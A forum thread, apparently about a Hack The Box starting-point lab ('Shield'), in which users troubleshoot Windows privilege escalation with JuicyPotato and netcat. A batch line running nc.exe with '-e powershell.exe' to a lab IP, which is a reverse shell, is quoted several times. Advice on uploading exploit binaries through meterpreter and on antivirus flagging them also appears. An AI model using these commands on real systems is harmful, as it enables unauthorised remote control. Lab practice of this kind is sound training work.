Starting Point: Shield, JuicyPotato and netcat

Type your comment> @R4ZZB33RY said:

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

your .bat file is not correct

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

Type your comment> @VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

Type your comment> @R4ZZB33RY said:

Type your comment> @VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

Great :smiley:

guys, I don’t get how to download juicypotato. if I go to the github page, and i donload it, there is not file called JuicyPotato.exe. where is it??

Here you go: Releases · ohpe/juicy-potato · GitHub

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

Type your comment> @Jade86 said:

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

it gets flagged by your operating system. You have to open the file

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

Type your comment> @tasidonya said:

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

ok I’ll do that. Just to be absolutely sure, you just clicked on the file and it downloaded, yeah?

@Jade86 yes.

Type your comment> @R4ZZB33RY said:

Type your comment> @Jade86 said:

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

it gets flagged by your operating system. You have to open the file

Ah I see! Ok, I feel a bit dumb here, but after I open the file, how do I save it in some folder on my machine? I’m very new to linux…

nevermind, done it. Thank you guys!!

What am I doing wrong?!

Type your comment> @misentomanuel said:

What am I doing wrong?!
https://imgur.com/zLfx2Zh.png

ok so I’m not an expert but it seems that there is no file called nc.exe in your local /home/kali/Desktop folder, so when you try to upload it to the box it tells you so. Then, obviously when you try and execute it, you can’t because the file is not there.
The reason why you do see a file called nc.exe in the remote uploads folder is probably cause someone else is doing the same box and they uploaded it successfully. The other thing, when you execute nc.exe, you need to change the ip address to YOUR own ip address, so that 10.10.14.2 needs to be changed, otherwise you are basically contacting anotehr machine that isn’t yours. also when you do lcd /home/username/downloads, that again is a fictitious folder that the guy who wrote the walkthrough created, but you need to substitute the path to your local folder that contains the exploits to that fictitious folder. Start by changing these things, and see how it goes.

Type your comment> @Jade86 said:

Type your comment> @misentomanuel said:

What am I doing wrong?!
https://imgur.com/zLfx2Zh.png

ok so I’m not an expert but it seems that there is no file called nc.exe in your local /home/kali/Desktop folder, so when you try to upload it to the box it tells you so. Then, obviously when you try and execute it, you can’t because the file is not there.
The reason why you do see a file called nc.exe in the remote uploads folder is probably cause someone else is doing the same box and they uploaded it successfully. The other thing, when you execute nc.exe, you need to change the ip address to YOUR own ip address, so that 10.10.14.2 needs to be changed, otherwise you are basically contacting anotehr machine that isn’t yours. also when you do lcd /home/username/downloads, that again is a fictitious folder that the guy who wrote the walkthrough created, but you need to substitute the path to your local folder that contains the exploits to that fictitious folder. Start by changing these things, and see how it goes.

Thanks for replay. https://imgur.com/z0NzLq6.png idk :frowning:
username is my dir on my kali right? home/kali/Downloads is my dir

Type your comment> @misentomanuel said:

Type your comment> @Jade86 said:

(Quote)
Thanks for replay. https://imgur.com/z0NzLq6.png idk :frowning:
username is my dir on my kali right? home/kali/Downloads is my dir

Ok, open another terminal and type “find -name nc.exe” , and see what it gives you. Then do the same with juicypotato.exe and see what it gives you. The result of these two operations should
Give you the exact path where you have the two files on your machine.

Type your comment> @Jade86 said:

Type your comment> @misentomanuel said:

Type your comment> @Jade86 said:

(Quote)
Thanks for replay. https://imgur.com/z0NzLq6.png idk :frowning:
username is my dir on my kali right? home/kali/Downloads is my dir

Ok, open another terminal and type “find -name nc.exe” , and see what it gives you. Then do the same with juicypotato.exe and see what it gives you. The result of these two operations should
Give you the exact path where you have the two files on your machine.

I gave that command both on the terminal of my kali and inside meterpreter. Find nothing :frowning:

Type your comment> @misentomanuel said:

I gave that command both on the terminal of my kali and inside meterpreter. Find nothing :frowning:

Ok, that means that you don’t have the two exploits downloaded on your computer. What the walkthrough doesn’t tell you is that you have to download both nc.exe and JuicyPotato.exe on your machine first, and THEN upload them to the target machine. You can find both of them on github.